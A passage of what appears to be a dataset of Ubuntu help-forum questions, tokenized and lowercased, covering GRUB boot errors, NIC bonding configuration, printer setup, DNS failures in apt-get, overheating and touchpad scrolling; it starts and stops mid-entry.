disorganized , but the count of currently pending sectors is what i was talking about , not the reallocation or reallocated sector counts 0.05 % done , 1:39:16 elapsed . ( 444/0/124 errors ) is the latest output
484765	openmp activation on geany	i am new to parallel programing and c , and was wondering how to active openmp on geany or another c program on linux ? it is a simple hello world i am trying to make : # include < stdio.h > # include < omp.h > int main ( ) { # pragma omp parallel { int id=0 ; printf ( `` hello ( % d ) '' , id ) ; printf ( `` world ( % d ) \n '' , id ) ; } } but when compile i get some warnings , and can imagen i havent activated or set my compiler correctly .
484768	does the mlocate.db generated by my updatedb cron job also applies to 'find ' ?	reviewing the find man pages for linux and for unix , i came across the fact that the mlocate.db seems to apply to 'find ' based searches as well as to 'locate ' executions in certain flavors of ux . so an 'updatedb ' cron job would benefit both command searches in terms of speed . i could not corroborate that for the linux bash environment . how is it in either a posix compliant or a non posix compliant bash environment for linux-ubuntu ?
484769	kworker/0:2 high cpu usage	i just install ubuntu 14.04 on a brand new toshiba satellite and notice high usage of one of the cores on th cpu ( over 95 % ) , running a perf record i found this : 20,69 % swapper [ kernel.kallsyms ] [ k ] acpi_os_read_port 19,35 % kworker/0:2 [ kernel.kallsyms ] [ k ] acpi_os_write_port 12,24 % kworker/0:2 [ kernel.kallsyms ] [ k ] acpi_os_read_port 8,79 % swapper [ kernel.kallsyms ] [ k ] intel_idle i read that this is a well documented bug but in 11.04 , so i have 2 question 1.- this bug persist on kernel 3.13.0-29 ? 2.- any suggestion to solve this issue ? thanks in advance
484771	recommend linux distribution for desktop pcs with 1 gb ( or less ) ram	i have an older model desktop pc , a compaq presario sr5250nx ( for the detailed tech specs ) , with only 1 gb of a ram and an intel celeron 1.2 ghz processor ( the hp website identifies it as an intel pentium e2140 dual core processor , but my system configuration always identified it as a 'celeron ' so i 'm not sure which is correct ) . anyway , long story short , i have a newer computer now running windows 7 home premium and very happy with its performance ( the seven-year-old compaq running windows vista just was n't cutting it anymore ) . i thought , `` is n't it kind of a waste to keep recycling these old pcs every six or seven years ? '' so , i sought out ubuntu 14.04 `` trusty tahr '' . first time i 'd assembled and installed the linux distribution ( very simplified process compared to 10-15 years ago , that 's for sure ! most peoples ' grandmothers could easily be walked through the process in very short order , i would think ) . i did n't bother with verifying the `` md5checksum '' step but recommended infrarecorder product worked beautifully . once installed , went to work getting the printer set up correctly ( again , very impressed with the driver compatibility of my system 's hardware - network card , wireless network card , mouse , keyboard , monitor and printer were all automatically recognized , to ubuntu 's credit ) . two-way folder sharing and home networking with the windows 7 pc was a dream ( nearly as simple as setting it up on the windows-based pc ) , thanks to the very impressive samba package . some great tutorials ( wo n't link to them all hear ) were used to configure the smb.conf file , create a samba user via the smbusers and create a samba user 's password via smbpasswd were all great and am tremendously thankful for all of them . i can easily get used to the libreoffice office productivity suite and firefox over chrome is actually preferable thanks to its chrome-like ui . the automatically updating software packages ( via ubuntu software centre ) are a dream , even easier to use than windows update . the problem i 'm having is with my choice in linux distribution , i think . given the pc 's only 1 gb of ram ( and ubuntu 's minimum requirements being 1 gb ) , i 'm thinking that 's the reason it slows to a crawl and even freezes every time i have firefox and one or two other applications open . ( if i only have ubuntu software centre open along with firefox , i 'm done for sure and nothing will work to restart the pc without a `` cold boot '' . ) my question is , would upgrading the pc 's ram by adding an additional 1 gb of ram ( or so ) , make much of a difference to allow me to operate effectively up to 5 applications at one time ( i.e. , maybe a firefox instance with two tabs open , libreoffice , nautilus file explorer and maybe thunderbird ) or is the processor and/or graphics card simply `` too old '' to bother with ? if so , what distribution would you recommend as an alternative ? my searches of the web have brought me to looking into puppy linux , xubuntu and damn small linux . would either of those work and do either of them at least feature an automatically-updating software update centre/package like ubuntu does ? i do n't really care what the gui is - kde , gnome , unity , xfce , whatever . it does n't have to be as easy to use as ubuntu , just something i can manage with some sort of user interface alongside my somewhat limited set of known command-line functions and conf file configuration . an `` auto-update '' software package/tool would be nice as well as an initial installation program that installs from a recordable dvd image on system boot are really all i 'd like to see . this would be for a single boot system , as i would again be running wipedrive and installing fresh . ( great little & cheap tool , wipedrive is , unless someone else can recommend a free & open source software package that performs the same functions as wipedrive . ) i 'm interested in hearing the community 's thoughts on which distribution i should use . : ) cheers , doug
484772	grub error : out of disk on ubuntu server 12.04 after power interruption	i 've got an ubuntu server set up that has been running happily for a year or so with no problems to speak of . it 's configured in a raid-1 to keep everything nice and backed up . yesterday we had a brief power flicker following some lightning . when i went to power everything back up today , i got error : out of disk . looking around with ls shows me eight volumes . i get various errors trying to ls them : hd0 : unknown filesystem hd1 : unknown filesystem md/0 : unknown filesystem md/1 : unknown filesystem hd0 , msdos : bad filename hd0 , msdos1 : unknown filesystem hd1 , msdos2 : bad filename hd1 , msdos1 : bad filename booting into a gui with a live cd shows me two drives that i ca n't access . the searches i 've done so far have suggested that the problem might be a corrupted grub.cfg . 1 ) how can i fix that , and 2 ) do i need to take any special steps since i 've got a raid-1 setup ? thanks !
484773	long pause while installing	i 'm experiencing a long pause during the stage where it says , `` install ubuntu alongside windows 8 . '' i't been loading for about an hour now and i 'm not sure if it 's trying to load or it just stopped working . has anyone experienced this before ? what should i do ?
484775	ubuntu asks for permission to add a printer , but nothing works	i am trying to install my hp laserjet pro 400 color m451nw , got it all worked out using the hplip open-source program ( hplip-3.14.6 ) until i get to the very end where i verify and setup the device and then press `` add printer '' i then get prompted with a box where i can write username and password , and the text : you do not have permission to add a printer i 've tried entering credentials to all accounts i can think of but it does not seem to work . if i press cancel when prompted , i get this text in the console : printer queue setup failed . error : client-error-not-authenticated what am i doing wrong ? ? ?
484777	ppscsi patch for 3.x kernel ( 14.04 ) progress/availability ? ? ( kernel-patch-ppscsi-2.4 )	under 2.6.x kernel ( s ) there were a set of patches allowing attachment of so-called parallel port scsi devices like my fine hp 5100c flatbed scanner . recently upgraded to trusty 14.04 with 3.13.x kernel and no similar support/patches have i yet found . closest reference google locates is bug report on package `` kernel-patch-ppscsi-2.4 '' : https : //launchpad.net/ubuntu/+source ... ugs ? advanced=1 any way i can find more on the status/progress of said package/patch/bugfix ( or alternative ) ? thanks .
484779	fan under load does n't go full speed on acer laptop	on ubuntu 14.04 when i do any system intensive task like gaming and when temperatures reach over 80c for cpu and 70c for gpu , fan does n't spin as fast as it does in windows 7 under even lower temps . on minecraft cpu quickly goes up to 85 and more but fan is still one level lower than it is under windows 7 when cpu reaches 79c . i always thought that fan is controlled by bios because i could n't control it in win 7 but now it seems that os can actually control it . i 'm not sure about that though . also , i ca n't control screen brightness when ubuntu is powered on , but i can change it when the acer logo on boot up is shown . maybe fan and brightness have some connection in this issue . my laptop : acer aspire 5830g i7-2620m 2.7ghz , gt 540m 2gb , driver 331.38 , 8gb ddr3 1333 i really want to use ubuntu instead of windows but this prevents me from doing it completely . does anyone know how to enable fan to spin as fast as it does in windows ? thanks in advance !
484782	will not boot second time round	i 'm getting a bit stressed out with this ( trying to log in to ubuntu ) the install from live usb on to my windows xp system went well , gave the ubuntu op system 25gig and it installed . i 'm running a amd athlon ii 4core cpu , 4gig ddr3 800mhz memory , 500gig hdd , gforce xfx 8600 graphics card . i booted back up today and its telling me i 've got serious errors on my disk at / i 've gone into the grub menu tried ( nomodeset ) also tried running recovery mode and check for bad packages ect , all i keep getting is a screen with documentation informing me linux is free software and comes with no warranty . it also keeps telling `` locked read only file system '' i 've tried the change rw to ro command and god knows how many others ! i 've forgotten half the things i 've tried tonight . i 'm new to linux wanted to get in to this and experience all the positive things i 've been reading , but at the moment i 'm just pulling out my hair . any advice would be a big help cheers noel
484783	display locks up when using laptop display and nvidia-337 from xorg-edgers , ctrl-alt-f1 breaks me out	kind of a generic question but i do n't really know what 's relevant to the problem . i 'm using a t430s laptop when a nvidia optimus setup ( intel + nvidia gpus ) . it works perfectly when the laptop is in its dock with the lid closed driving two external monitors . however , if i remove the laptop from the dock after about 20 minutes of use the display completely locks up ( no mouse cursor movement at all ) . hitting ctrl-alt-f1 breaks out and from there i can run sudo restart lightdm to get my normal window environment back . i 'm using the xorg-edgers ppa and the nvidia-337 drivers . any ideas ? which logs can i check ?
484785	how to make kubuntu my login again , and get rid of ubuntu	i tried installing ubuntu 13.10 . after downloading i could select which ui top use , kubuntu or ubuntu . after updating and downloading proprietary graphic driver for ati card , my ubuntu is busted . when i boot up the kubuntu pulsing screen comes up , but then i get goes directly into ubuntu with no password or anything . i also noticed that the changes i made in ubuntu did not stick , there 's no mouse , and no gears in the top right of the global bar . i would prefer to go with ubuntu and get rid of kubuntu , but kubuntu was the last stable thing i used . home directory is partitioned separately , but honestly do n't mind if i lose files if i absolutely have to . i can access the tty command prompt and use other stuff through keyboard but that 's it . i have a kubuntu live usb still but i ca n't figure out how to get my pc to see it or use it for boot .
484787	how to import an arbitrary git branch into a bazaar repo on launchpad ?	i would like to import an arbitrary git branch ( not master ) into a bazaar repo on launchpad , but when requesting a new code import launchpad by default imports the head of the master branch . so how can i import , for example , the 2.1.x branch of the lyx git repository , if the url for the repo is git : //git.lyx.org/lyx ?
484791	populate places ' `` recent documents '' from thunar ?	i 'm using xubuntu & seem to have thunar and nautilus/files installed . the bookmarks menu and other things seem to default to thunar , which i prefer , but clicking on the dropbox taskbar icon opens it in nautilus , for example . anyway : it 's great that xfce/xubuntu/ubuntu now has recent documents via the places , uh , widget , but i 've deduced that it only populates from docs opened through nautilus , and not thunar . does anyone know if there 's a way to allow thunar-accessed items to populate places ' `` recent documents '' list ? thanks ! ( and please let me know if i should post this in the xfce forum )
484792	motorla atrix 4g not recognized	good afternoon i have a computer with ubuntu ( which i love ) i already try to conect my atrix 4g and does not recognize the phone it does charge it but is not letting me transfer any documents from the computer to the phone or viceverza . please help me . thanks dr
484796	wi-fi discconects shortly after router reset	i dual boot ubuntu 14.04 and windows 8 . on windows , wi-fi works fine with high speed . on ubuntu however , it 's very slow that i ca n't open any website , and disconnects and reconnects again often . when i restart my router , the wi-fi works for 10 to 15 minutes and then the issue starts all over . here is my wireless information : http : //pastebin.ubuntu.com/7663892/
484801	floppy drive permissions	why are floppy drive permissions assigned to my 3.5 '' 1.44 diskette drives in my ubuntu 12.04.4 and 13.10 operating systems ? same floppy drives on these dual boot ubuntu/windows machines do not have any permissions assigned under properties in windows and windows allows me to read and write perfectly to the diskettes . in the ubuntu operating systems the properties have a permissions tab , under the permissions tab it says i am not the owner and i can not change the permissions from the current `` root '' . it will not let me write to the diskette with my administrator profile . ( excuse me ! but i am the owner of all the content on my floppy diskettes ) . i know enough to know that `` user '' usage of a floppy diskette on a personal computer is identical to permissions associated with a common flash drive ( i.e . pen drive ) . how do i remove the lockout permissions on the floppy drive to be able to write to it ?
484802	unable to change the bonding mode to 4 , it always shows defaul 12.04.4 lts	bonding mode is always load balancing , unable to change to 4 . 1- installed ifenslave-2.6 dpkg -l | grep ifen ii ifenslave-2.6 1.1.0-19ubuntu5 attach and detach slave interfaces to a bonding device 2- configured the eth1 , eth3 and bond0 in /etc/network/interface and /etc/modprobe.d/bonding.conf . echo bonding > > /etc/modules sudo modprobe bonding cp /etc/network/interfaces /etc/network/interfaces.orig ifdown eth1 ifdown eth3 ifdown bond0 echo # # # # # # # # # # # # # # # # # # # # # # # > > /etc/network/interfaces echo auto eth1 > > /etc/network/interfaces echo iface eth1 inet manual > > /etc/network/interfaces echo bond-master bond0 > > /etc/network/interfaces echo bond-primary eth1 > > /etc/network/interfaces echo # # # # # # # # # # # # # # # # # # # # # # # > > /etc/network/interfaces echo auto eth3 > > /etc/network/interfaces echo iface eth3 inet manual > > /etc/network/interfaces echo bond-master bond0 > > /etc/network/interfaces echo # # # # # # # # # # # # # # # # # # # # # # # > > /etc/network/interfaces echo auto bond0 > > /etc/network/interfaces echo iface bond0 inet static > > /etc/network/interfaces echo address 10.15.53.254 > > /etc/network/interfaces echo gateway 10.15.53.3 > > /etc/network/interfaces echo netmask 255.255.255.0 > > /etc/network/interfaces echo bond-mode 4 > > /etc/network/interfaces echo bond-miimon 100 > > /etc/network/interfaces echo bond-lacp-rate 1 > > /etc/network/interfaces echo bond-slaves eth1 eth3 > > /etc/network/interfaces echo alias bond0 bonding > > /etc/modprobe.d/bonding.conf echo options bond0 mode=4 miimon=100 lacp_rate=1 > > /etc/modprobe.d/bonding.conf 3-after this tried ifconfig bond0 , eth1 , eth3 up and down and sudo service networking restart . 4- bonding mode still shows mode 0. cat /proc/net/bonding/bond0 ethernet channel bonding driver : v3.7.1 ( april 27 , 2011 ) bonding mode : load balancing ( round-robin ) mii status : up mii polling interval ( ms ) : 100 up delay ( ms ) : 0 down delay ( ms ) : 0 can you help with this issue . appreciate your suggestions . thanks in advance .
484803	computer overheats and shuts down kubuntu	my dad has been recomending me to get linux for a long time . recently i got a driver error on windows 8 , it escalated and now windows will not boot up anymore . my dad told me to get kubuntu so atleast i did n't have a dead computer . ever since i got it , my computer has gotten very hot . when i play games from steam like garry 's mod , team fortress 2 , etc . my computer will get very hot ( this has never happened before ) and it will get so hot it will shut off , crash , `` blow a fuse , '' whatever you want to call it . just on the internet it 's hot . i do n't know what to do anymore . it is not the battery being in my laptop when it is plugged in . if anyone knows please help me out thanks ! ask questions if you have any . p.s . i have kubuntu 14.04 and have gotten the most recent software update as of 6/17/14
484812	wine not responding at all	i installed wine in order to play some older games that windows no longer supported . at first this worked almost perfectly except one of the games ( mechwarrior3 ) would freeze every time a in game dialogue box popped up . so i reconfigured wine to run in windows 98 mode and ever since then nothing works . can not open wine tricks , can not open configure wine , and can not open any exe files . i have tried uninstalling , reinstalling wine and mechwarrior3 and just seem to be going in reverse . ( since wine does n't work , cant reinstall mechwarrior3 ) i am running ubuntu v14.04 and wine 1.6 1:1.6.2-0 any suggestions would greatly be appreciated .
484813	problems dual booting mac os mavericks and ubuntu 14.04	recently i removed my ubuntu partition from my macbook pro late 2011 because i made a mistake ( that will not be made again ) of deleting python 2.7.6 because i thought : hey ! if i have python v3 then i do not need python 2.7.6 . as it turns out , there are many dependencies on python 2.7.6 . this mistake wo n't be made again . so now i am going for installation round 2 . i have used disk utility to delete my linux partition . i am not using refit for now as after several installation attempts , i kept running into another issue where it gave me two options : to boot linux from hd ( as i have always used ) and to boot linux from partition 3 . anyways ... i created a 250 gb ( out of 750 gb total ) partition in ms-dos format using disk utility . i then reinstalled refit . now , i insert my cd containing ubuntu 14.04 and follow the installation instructions . i format the fat partition to ext3 and make sure that my installation is set to the create partition . the installation process does its thing and then asks to restart and spits out my cd . now , when the computer is rebooting and i am holding down the option key , i have the choice to enter mac partition or what my computer is calling windows . this is referring to the linux partition and is expected . when i enter the windows partition it brings up the error error : no such partition entering rescue mode ... grub rescue > strangely , if i power down the computer from here , and reboot without holding option , linux boots up perfectly ( although the messages that come up during the booting process look different than to what i got used the first go round ) . any ideas everyone ? it would be greatly appreciated !
484815	opera print dialog not appearing	stuck . please help . environment : ubuntu 14.04 server installation sudo tasksel print-server sudo apt-get install xorg nodm opera sudo usermod -ag lpadmin printer_admin_user sudo usermod -ag lp , sys printer_user in operaprefs.ini have set : [ printer ] printercustomname=lpr printername=lp in an x session ( run by the printer_user ) i can open opera , and configure a printer in the cups browser-interface as the printer_admin_user . however opera does not generate a print preview or print dialog .
484817	problems in aptana 3 after upgrade from 13.10 to 14.04	i have different problems in different des after upgrade , in kubuntu aptana studio 3 fails to open with a problem on workbench , in ubuntu it opens but if i try to use browser preview it gives this error : unhandled event loop exception no more handles [ could not detect registered xulrunner to use ] i have searched and found some similar issues but not exactly the same , i 've read about issues maybe with jdk i 'm not exactly sure about how to proceed . i need to fix this asap so any help is appreciated . update : getting this mesage : the crashed program seems to use third-party or local libraries : /home/hucasys/aptana_studio_3/configuration/org.eclipse.osgi/bundles/246/1/.cp/libswt-gtk-3740.so /home/hucasys/aptana_studio_3/configuration/org.eclipse.osgi/bundles/61/1/.cp/os/linux/x86_64/libjnotify.so /home/hucasys/aptana_studio_3/plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.100.v20110505/eclipse_1407.so /home/hucasys/aptana_studio_3/configuration/org.eclipse.osgi/bundles/159/1/.cp/os/linux/x86_64/libunixfile_1_0_0.so /home/hucasys/aptana_studio_3/configuration/org.eclipse.osgi/bundles/246/1/.cp/libswt-atk-gtk-3740.so /home/hucasys/aptana_studio_3/configuration/org.eclipse.osgi/bundles/246/1/.cp/libswt-cairo-gtk-3740.so /home/hucasys/aptana_studio_3/configuration/org.eclipse.osgi/bundles/246/1/.cp/libswt-pi-gtk-3740.so it is highly recommended to check if the problem persists without those first . do you want to continue the report process anyway ? should i just unistall with synaptic ?
484820	no audio after installing ubuntu 14.04	im using a laptop . internal speakers working fine . headphone jack has no output signal since installing ubuntu . laptop only has mic input and headphone output . nothing else . everything worked fine with windows vista . im using self powered computer speakers plugged into the headphone jack . alsa mixer shows all levels are up and a strong signal going to the headphone jack . it seems maybe the signal is mono when it should be stereo and therefore a stereo 1/8 inch headphone jack will not work . how should i approach this problem . ?
484822	can the applications at `` startup applications '' be less encumbersome ?	with this tip i saw there is a total of about 60 applications being started.. i have to sit back and wait about 45s while the desktop is unresponsive ... how startup applications work ? can i tweak it in some way to make these apps start slower , not all together ? i dont want to disable any , just that they let me quick login ...
484823	i 've lost connection to my network after a failed attempt at a bridged connection	i need some help fast . i set up two server systems and decided to go full linux on them , all in for the first time . i 've pretty much since spent the entire time googling `` how to install [ software i want ] ubuntu '' . when i got to openvpn , i was especially clueless , and found this tutorial to be of little use . i was able to get farther in this tutorial , and used sudo nano /etc/network/interfaces to add the following lines auto br0 iface br0 inet static address 192.0.2.1 netmask 255.255.255.0 network 192.0.2.0 broadcast 192.0.2.255 bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp on bridge_prio 1000 as the second tutorial stated . then i used sudo ifup br0 and low and behold my connection died . i tried deleting the lines and using sudo ifup lo to no avail , then decided on a classic reboot to little effect . so , my server is offline . how can i reverse this ?
484825	printing with cups in windows 8	i have a usb printer ( hp officejet 100 mobile printer l411a ) pluged into my linux laptop with the ip of 192.168.0.11 i hooked it up with cups and selected share and the cups printer name is hp officejet 100 mobile printer l411a . i went to http : //192.168.0.11:631/printers/ ? and right clicked on the hp 100 mobile printer and clicked copy link address http : //192.168.0.11:631/printers/hp-officejet-100-mobile-l411 . i then went to the windows 8 settings and pasted the above link into the shared printer box and it found my printer . it asked me to print a test page so i did and after a minute it said test print failed printer in a error state . i tried reading the printer and rebooting both laptops and the printer and it did not work . how can i fix this . all help is appreciated
484826	sudo apt-get update can not resolve servers , but i can ping them	for the last few days , when i run sudo apt-get update , it fails because some of the hosts can not be resolved . however , i can ping them , so they definitely are getting resolved . my internet is working great . i also have that red ! in a triangle up in the corner . here is a sample of the output from apt-get : steve @ steve-ub : ~ $ sudo apt-get update ign http : //ppa.launchpad.net trusty inrelease hit http : //ppa.launchpad.net trusty release.gpg hit http : //ppa.launchpad.net trusty release hit http : //ppa.launchpad.net trusty/main amd64 packages hit http : //ppa.launchpad.net trusty/main i386 packages ign http : //ppa.launchpad.net trusty/main translation-en_us ign http : //ppa.launchpad.net trusty/main translation-en err http : //repo.steampowered.com precise inrelease err http : //repo.steampowered.com precise release.gpg could not resolve 'repo.steampowered.com' err http : //archive.canonical.com trusty inrelease err http : //extras.ubuntu.com trusty inrelease err http : //us.archive.ubuntu.com trusty inrelease i cut some of the output here , continuing later : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty-updates/release.gpg could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty-backports/release.gpg could not resolve 'us.archive.ubuntu.com' w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg could not resolve 'dl.google.com' w : some index files failed to download . they have been ignored , or old ones used instead . and yet , i can ping the hosts that could not be resolved : steve @ steve-ub : ~ $ ping us.archive.ubuntu.com ping us.archive.ubuntu.com ( 91.189.91.14 ) 56 ( 84 ) bytes of data . 64 bytes from orobas.canonical.com ( 91.189.91.14 ) : icmp_seq=1 ttl=49 time=59.8 ms ... steve @ steve-ub : ~ $ ping repo.steampowered.com ping user-att-75-46-72-0.a1507.d.akamai.net ( 23.72.83.64 ) 56 ( 84 ) bytes of data . 64 bytes from a23-72-83-64.deploy.static.akamaitechnologies.com ( 23.72.83.64 ) : icmp_seq=1 ttl=56 time=20.8 ms how can i get updates to work again ?
484827	firewall blocking access to dvr web server on lan . how can i open access ?	i have a ubuntu 14.04 server as my dhcp modem on my network . on my lan i have security cams on a web server that worked fine with port forwarding and dhcp on the web server . the problem arises when the dhcp server reassigns the ip address and i have to change the port forwarding . i switched to a fixed ip address on the dvr but for some reason , the cams are not visible outside of the lan
484828	i want to switch to lubuntu , how can i take all of my programs/files with me ?	i 'm going to switch from ubuntu to lubuntu for my htpc/server because i hear lubuntu is faster , what 's a ( preferrably easy ) way to take all of my files and programs with me ? i 'm very new to linux and i 'm not sure if i could survive the ordeal of installing my few programs again .
484831	partition resizing to add windows 7	when i got ubuntu , i accidentally formatted windows 8 and now i only have ubuntu . i was able to obtain a windows 7 iso , and i would like to put that in . i have installed the iso into my flash drive , but i have no been able to install it through the bios . i have an asus r510c . i am trying to use gparted to resize the partition to clear space and use the setup.exe to install windows 7 . how exactly can i resize the partition ? i am not able to . i can include any other requested information . thanks for any help .
484833	ubuntu 14.04 java bandwidth use	so several times i stare at my laptop resource monitor and see data usage on the meter . i was curious today since i am connected via an at & t usb modem , i do not wish to exceed my allotted data cap . i installed nethogs ( sudo apt-get install nethogs ) and ran utility ( sudo nethogs wwan0 ) . and noticed java was using all the bandwidth . how do i mitigate this ? is this neccessary ? it has ran this way for hours before , i assumed it was thunderbird , or owncloud or google drive syncing . output : pid > > > > > > > > > user > > > > > > > > > program > > > > > > > > > dev > > > > > > > > > sent > > > > > > > > > received 2421 > > > > > > > > '' me '' > > > > > > > > java > > > > > > > > > > > > wwan0 > > > > > > 14.5 > > > > > > > > > > 340.459 > kb/sec i ca n't post pictures because i am new here , and link to images are normally frowned upon . i did search google and came up with a few questions and no answers . this has been `` downloading '' for about 3 hours now . i cant believe this is an update as this is normally handled via apt .
484834	pnp0f03 linux touchpad scrolling	i have a laptop ( a cheap oem generic ) that comes equipped with a pnp0f03 touchpad . this touchpad works very well ( tap click , scroll etc ) under windows and works pretty well under ubuntu . the only issue i have with it is that it refuses to scroll up . when i swipe upward , it moves the page down at 2x speed . ( not the case under windows ) . to combat this , i 've tried installing this driver , which i found on a forum post had helped someone with arch . the installation went smoothly but did not correct the issue . i figure there must be an easier way to deal with this , since it reliably recognizes scrolling gestures but just does n't execute one of them properly . any thoughts would be greatly appreciated . for reference : kubuntu @ kubuntu : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ imexps/2 generic explorer mouse id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb2.0 camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] and kubuntu @ kubuntu : ~ $ dmesg | grep -i input [ 10.373029 ] input : lid switch as /devices/lnxsystm:00/device:00/pnp0c0d:00/input/input0 [ 10.376019 ] input : sleep button as /devices/lnxsystm:00/device:00/pnp0c0e:00/input/input1 [ 10.376121 ] input : power button as /devices/lnxsystm:00/device:00/pnp0c0c:00/input/input2 [ 10.376215 ] input : power button as /devices/lnxsystm:00/lnxpwrbn:00/input/input3 [ 10.464402 ] input : at translated set 2 keyboard as /devices/platform/i8042/serio0/input/input4 [ 10.745066 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input6 [ 41.808030 ] input : usb2.0 camera as /devices/pci0000:00/0000:00:1d.7/usb1/1-2/1-2:1.0/input/input8 [ 42.770426 ] inputs : [ 42.822940 ] input : hda intel hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 42.823275 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input10 [ 42.823565 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 42.934573 ] input : imexps/2 generic explorer mouse as /devices/platform/i8042/serio1/input/input7 and kubuntu @ kubuntu : ~ $ cat /sys/class/input/mouse0/device/uevent product=11/2/6/0 name= '' imexps/2 generic explorer mouse '' phys= '' isa0060/serio1/input0 '' prop=0 ev=7 key=1f0000 0 0 0 0 rel=143 modalias=input : b0011v0002p0006e0000-e0,1,2 , k110,111,112,113,114 , r0,1,6,8 , amlsfw and kubuntu @ kubuntu : ~ $ cat /var/log/xorg.0.log | grep -i input [ 122.075 ] ( ii ) the server relies on udev to provide the list of input devices . [ 122.075 ] x.org xinput driver : 20.0 [ 122.158 ] initializing built-in extension xinputextension [ 122.336 ] ( ii ) modesetting ( 0 ) : digital display input [ 122.621 ] ( ii ) config/udev : adding input device power button ( /dev/input/event3 ) [ 122.621 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 122.622 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 122.623 ] module class : x.org xinput driver [ 122.623 ] abi class : x.org xinput driver , version 20.0 [ 122.623 ] ( ii ) using input driver 'evdev ' for 'power button' [ 122.623 ] ( ** ) evdev : power button : device : `` /dev/input/event3 '' [ 122.623 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input3/event3 '' [ 122.623 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 122.625 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event5 ) [ 122.625 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 122.625 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 122.625 ] ( ** ) evdev : video bus : device : `` /dev/input/event5 '' [ 122.625 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0a08:00/lnxvideo:00/input/input6/event5 '' [ 122.625 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 122.627 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 122.627 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 122.627 ] ( ii ) using input driver 'evdev ' for 'power button' [ 122.627 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 122.627 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input2/event2 '' [ 122.627 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 8 ) [ 122.629 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event0 ) [ 122.629 ] ( ii ) no input driver specified , ignoring this device . [ 122.630 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/event1 ) [ 122.630 ] ( ** ) sleep button : applying inputclass `` evdev keyboard catchall '' [ 122.630 ] ( ii ) using input driver 'evdev ' for 'sleep button' [ 122.630 ] ( ** ) evdev : sleep button : device : `` /dev/input/event1 '' [ 122.630 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0e:00/input/input1/event1 '' [ 122.630 ] ( ii ) xinput : adding extended input device `` sleep button '' ( type : keyboard , id 9 ) [ 122.632 ] ( ii ) config/udev : adding input device hda intel headphone ( /dev/input/event8 ) [ 122.632 ] ( ii ) no input driver specified , ignoring this device . [ 122.633 ] ( ii ) config/udev : adding input device hda intel hdmi/dp , pcm=3 ( /dev/input/event7 ) [ 122.633 ] ( ii ) no input driver specified , ignoring this device . [ 122.634 ] ( ii ) config/udev : adding input device hda intel mic ( /dev/input/event9 ) [ 122.634 ] ( ii ) no input driver specified , ignoring this device . [ 122.635 ] ( ii ) config/udev : adding input device usb2.0 camera ( /dev/input/event6 ) [ 122.635 ] ( ** ) usb2.0 camera : applying inputclass `` evdev keyboard catchall '' [ 122.635 ] ( ii ) using input driver 'evdev ' for 'usb2.0 camera' [ 122.635 ] ( ** ) evdev : usb2.0 camera : device : `` /dev/input/event6 '' [ 122.635 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-2/1-2:1.0/input/input8/event6 '' [ 122.635 ] ( ii ) xinput : adding extended input device `` usb2.0 camera '' ( type : keyboard , id 10 ) [ 122.637 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event4 ) [ 122.637 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 122.637 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 122.637 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event4 '' [ 122.637 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input4/event4 '' [ 122.637 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 11 ) [ 122.639 ] ( ii ) config/udev : adding input device imexps/2 generic explorer mouse ( /dev/input/event10 ) [ 122.639 ] ( ** ) imexps/2 generic explorer mouse : applying inputclass `` evdev pointer catchall '' [ 122.639 ] ( ii ) using input driver 'evdev ' for 'imexps/2 generic explorer mouse' [ 122.639 ] ( ** ) evdev : imexps/2 generic explorer mouse : device : `` /dev/input/event10 '' [ 122.639 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio1/input/input7/event10 '' [ 122.639 ] ( ii ) xinput : adding 